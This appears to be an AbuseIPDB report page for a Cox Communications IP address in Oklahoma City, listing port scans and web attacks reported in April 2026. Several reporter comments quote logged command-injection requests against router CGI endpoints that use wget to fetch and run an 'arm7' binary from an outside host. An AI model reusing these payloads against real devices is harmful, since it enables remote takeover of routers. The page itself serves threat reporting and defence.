JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 72.198.88.250

72.198.88.250 was found in our database!

This IP was reported 18 times. Confidence of Abuse is 0%: ?

ISP	Cox Communications
Usage Type	Fixed Line ISP
ASN	AS22773
Hostname(s)	ip72-198-88-250.ok.ok.cox.net
Domain Name	cox.com
Country	🇺🇸 United States of America
City	Oklahoma City, Oklahoma

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 72.198.88.250

Whois 72.198.88.250

IP Abuse Reports for 72.198.88.250:

This IP address has been reported a total of 18 times from 16 distinct sources. 72.198.88.250 was first reported on December 4th 2025, and the most recent report was 2 months ago.

Old Reports: The most recent abuse report for this IP address is from 2 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇮🇩 titis.blitarkab	2026-04-07 07:44:00 (2 months ago)	remote code injection /ping.cgi?pingIpAddress=google.fr;wget%20http://37.48.254.120/arm7%20-O%20/tm ... show more remote code injection /ping.cgi?pingIpAddress=google.fr;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27/&sessionKey=1039 /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ show less	Bad Web Bot Exploited Host Web App Attack Hacking
🇧🇷 SOC-BR	2026-04-07 07:18:15 (2 months ago)	Attack detected by Fortinet - applications3: D-Link.DSL-2750B.CLI.OS.Command.Injection - 2026-04-06 ... show more Attack detected by Fortinet - applications3: D-Link.DSL-2750B.CLI.OS.Command.Injection - 2026-04-06 16:09:17 - Source Port 46694 show less	Port Scan Hacking
🇺🇸 MPL	2026-04-07 04:22:18 (2 months ago)	tcp/80 (2 or more attempts)	Port Scan
🇹🇭 Sawasdee	2026-04-06 04:18:04 (2 months ago)	Unwanted checking 80 or 443 port ...	Bad Web Bot
🇺🇸 Rip	2026-04-06 02:54:05 (2 months ago)	Automated recon attempt targeting restricted and sensitive paths.	Web App Attack
🇫🇷 Coco Bongo	2026-04-05 21:50:30 (2 months ago)	72.198.88.250 - (22773-ASN-CXA-ALL-CCI-22773-RDC United States Oklahoma City) - - [05/Apr/2026:23:50 ... show more 72.198.88.250 - (22773-ASN-CXA-ALL-CCI-22773-RDC United States Oklahoma City) - - [05/Apr/2026:23:50:14 +0200] "GET /ping.cgi?pingIpAddress=google.fr;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7; ... show less	Bad Web Bot Web App Attack
🇺🇸 xmission.com	2026-04-05 14:26:13 (2 months ago)	Blocked by UFW (TCP on 52869) Source port: 17615 TTL: 51 Packet length: 44 TOS: 0x08 This report (f ... show more Blocked by UFW (TCP on 52869) Source port: 17615 TTL: 51 Packet length: 44 TOS: 0x08 This report (for 72.198.88.250) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇺🇸 MPL	2026-04-04 20:42:11 (2 months ago)	tcp/80	Port Scan
🇺🇸 MPL	2026-04-04 20:42:11 (2 months ago)	tcp/80 (2 or more attempts)	Port Scan
🇧🇬 Stoyko Stoykov	2026-04-04 04:49:18 (2 months ago)	72.198.88.250 - - [04/Apr/2026:07:49:17 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.25 ... show more 72.198.88.250 - - [04/Apr/2026:07:49:17 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ HTTP/1.1" 400 150 "-" "r00ts3c" ... show less	Hacking Web App Attack
🇮🇪 RoboSOC	2026-04-03 23:52:50 (2 months ago)	Comtrend VR-3033 Remote Command Execution Vulnerability, PTR: ip72-198-88-250.ok.ok.cox.net.	Hacking
🇧🇷 SOC PR	2026-04-03 10:38:25 (2 months ago)	Blocked by corporate SOC firewall: Attack detected: Comtrend Command Injection (CVE-2020-10173).	Web App Attack
🇺🇸 technojoe99	2026-04-03 09:39:03 (2 months ago)	Vulnerable HTTP/1.0 from 72.198.88.250. GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/ar ... show more Vulnerable HTTP/1.0 from 72.198.88.250. GET /login.cgi?cli=aa%20aa%27;wget%20http://37.48.254.120/arm7%20-O%20/tmp/arm7;chmod%20777%20/tmp/arm7;/tmp/arm7%27$ HTTP/1.1. show less	Bad Web Bot
🇭🇺 bcsaba	2026-04-03 07:03:56 (2 months ago)	Suricata: Alert - ET EXPLOIT D-Link DSL-2750B - OS Command Injection	Web App Attack
🇩🇪 dpsbs	2026-04-03 03:00:13 (2 months ago)	multiple ips intrustions detected	Hacking

Showing 1 to 15 of 18 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇨🇦 2607:5300:205:200::81e7

🇳🇱 193.176.31.235

🇳🇱 185.223.235.43

🇺🇸 66.132.195.104

🇺🇸 66.132.195.102

🇧🇷 43.164.195.69

🇮🇷 37.32.10.237

🇺🇸 158.51.96.38

🇺🇸 136.116.82.71

🇨🇳 120.48.11.36

🇨🇳 113.101.43.134

🇵🇰 39.34.172.49

🇬🇧 35.203.211.176

🇺🇸 2603:900b:2800:ed:4e17:44ff:fed3:dc02

🇰🇷 211.37.174.180

🇲🇩 193.36.38.226

🇻🇳 110.172.29.157

🇺🇸 98.84.131.195

🇱🇹 62.60.130.241

🇺🇸 20.168.121.252